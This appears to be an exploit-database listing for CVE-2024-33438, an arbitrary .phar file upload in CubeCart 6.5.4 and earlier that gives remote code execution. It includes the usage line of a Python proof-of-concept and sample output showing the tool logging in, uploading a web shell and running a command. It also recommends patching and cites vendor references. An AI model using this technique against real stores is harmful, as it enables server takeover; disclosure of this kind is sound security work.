## https://sploitus.com/exploit?id=EF7210E4-72F5-5C62-97E9-90F6B05BB515
# Arbitrary File Upload Leads to RCE (CVE-2024-33438)
CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload issue that leads to remote code execution (RCE). The vulnerability affects the application's file manager and its filters by allowing attackers to upload `.phar` files containing malicious code. CubeCart should be updated to 6.5.5 as it implements a security patch to fix this vulnerability.
For more details, please see the official announcement by CubeCart in the references.
## Exploit
An automated proof-of-concept (PoC) has been created, but this vulnerability can also be exploited manually by uploading a malicious `.phar` file via the file manager.
This is the usage of the PoC:
```
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
```
After running it, this is the expected output for a successful exploitation:
```
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data
```
## References
* https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
* https://github.com/cubecart/v6/issues/3570
* https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
* https://vulners.com/cve/CVE-2024-33438
* http://blog.cat22.io/blog/cve/cve-2024-33438.html